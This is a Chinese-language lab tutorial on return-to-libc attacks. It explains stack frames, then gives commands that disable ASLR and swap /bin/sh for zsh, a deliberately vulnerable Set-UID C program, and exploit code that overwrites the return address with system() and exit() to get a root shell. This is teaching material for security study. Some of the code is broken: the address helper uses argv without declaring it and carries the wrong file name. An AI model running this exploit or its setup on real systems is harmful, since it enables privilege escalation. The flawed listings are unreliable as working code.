Return-to-libc 攻击实验

Return-into-libc 攻击可以将漏洞函数返回到内存空间已有的动态库函数中。而为了理解 return-into-libc 攻击，这里首先给出程序函数调用过程中栈帧的结构。

上图给出了一个典型的函数调用时的栈帧结构，该栈从高位地址向低位地址增长。每当一个函数调用另一个函数向低地址方向压栈，而当函数返回时向高地址方向清栈。例如，当main() 调用 func(arg_1,arg_2,arg_3) 时，首先将所有参数arg_1,arg_2 和 arg_3入栈。图中参数从右向左依次被压入栈中，这是因为 C 语言中函数传参是从右向左压栈的。然后，call指令会将返回地址压栈，并使执行流转到func()。返回地址是 call 指令的下一条指令的地址，这个用于告知func ()函数返回后从main()函数的哪条指令开始执行。进入func函数后，通常需要将main()函数的栈底指针 ebp 保存到栈中并将当前的栈顶指针esp保存在 ebp中作为func的栈底。接下来，func函数会在栈中为局部变量等分配空间。因此，调用函数func()时的栈帧结构如图所示。 而当 func()执行完成返回时leave指令将ebp拷贝到esp中清空局部变量在栈中的区域，然后从堆栈中弹出老ebp放回ebp寄存器使ebp恢复为main()函数的栈底。然后ret指令从栈中获取返回地址，返回到 main()函数中继续执行。 攻击者可以利用栈中的内容实施 return-into-libc 攻击。这是因为攻击者能够通过缓冲区溢出改写返回地址为一个库函数的地址，并且将此库函数执行时的参数也重新写入栈中。这样当函数调用时获取的是攻击者设定好的参数值，并且结束后返回时就会返回到库函数而不是 main()。而此库函数实际上就帮助攻击者执行了其恶意行为。更复杂的攻击还可以通过 return-into-libc 的调用链（一系列库函数的连续调用）来完成。

输入命令安装一些用于编译 32 位 C 程序的东西：

sudo apt-get update
sudo apt-get install lib32z1 libc6-dev-i386
sudo apt-get install lib32readline-gplv2-dev

输入命令linux32进入 32 位 linux 环境。输入/bin/bash使用 bash。

Ubuntu 和其他一些 Linux 系统中，使用地址空间随机化来随机堆（heap）和栈（stack）的初始地址，这使得猜测准确的内存地址变得十分困难，而猜测内存地址是缓冲区溢出攻击的关键。因此本次实验中，我们使用以下命令关闭这一功能：

sudo sysctl -w kernel.randomize_va_space=0

此外，为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击，许多 shell 程序在被调用时自动放弃它们的特权。因此，即使你能欺骗一个 Set-UID 程序调用一个 shell，也不能在这个 shell 中保持 root 权限，这个防护措施在/bin/bash 中实现。
linux 系统中，/bin/sh 实际是指向/bin/bash 或/bin/dash 的一个符号链接。为了重现这一防护措施被实现之前的情形，我们使用另一个 shell 程序（zsh）代替/bin/bash。下面的指令描述了如何设置 zsh 程序：

sudo su
cd /bin
rm sh
ln -s zsh sh
exit

编写retlib.c文件：

// retlib.c
// This program has a buffer overflow vulnerability. 
// Our task is to exploit this vulnerability 
#include <stdlib.h>
#include <stdio.h>
#include <string.h> 
int bof(FILE *badfile)
{        
    char buffer[12];   //   The following statement has a buffer overflow problem           
    fread(buffer, sizeof(char), 40, badfile);        
    return 1;
}               

int main(int argc, char **argv)
{         
    FILE *badfile;         
    badfile = fopen("badfile", "r");      
    bof(badfile);                  
    printf("Returned Properly\n");      
    fclose(badfile); return 1;
}

编译该程序，并设置 SET-UID。
编写程序读取环境变量的程序：

// retlib.c
// This program has a buffer overflow vulnerability. 
// Our task is to exploit this vulnerability 
#include <stdlib.h>
#include <stdio.h>
#include <string.h> 
int main()
{
    char *ptr;
    ptr = getenv(argv[1]);
    ptr += (strlen(argv[0]) - strlen(argv[2]));
    printf("%s will be at %p\n", argv[1], ptr);
    return 0;
}

编写攻击程序：

//exploit.c 
#include <stdlib.h> 
#include <stdio.h> 
#include <string.h>  
int main(int argc, char **argv) 
{         
    char buf[40];        
    FILE *badfile;        
    badfile = fopen(".//badfile", "w");        // You need to decide the addresses and         the values for X, Y, Z. The order of the following        three statements does not imply the order of X, Y, Z.        Actually, we intentionally scrambled the order. *//       
    strcpy(buf,  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");// nop 16 times                
    *(long *) &buf[24] = 0xbffffe43 ; // "//bin//sh"      
    *(long *) &buf[16] = 0xb7ea88b0 ; // system()      
    *(long *) &buf[28] = 0xb7e9db30 ; // exit()      
    fwrite(buf, sizeof(buf), 1, badfile);      
    fclose(badfile);
}

获取内存地址
用刚才的 getenvaddr 程序获得 BIN_SH 地址：

export BIN_SH="/bin/sh"
echo $BIN_SH
gdb -q ./exploit
b 10
run
p system
p exit

攻击

先运行攻击程序 exploit，再运行漏洞程序 retlib，可见攻击成功，获得了 root 权限：

实验截图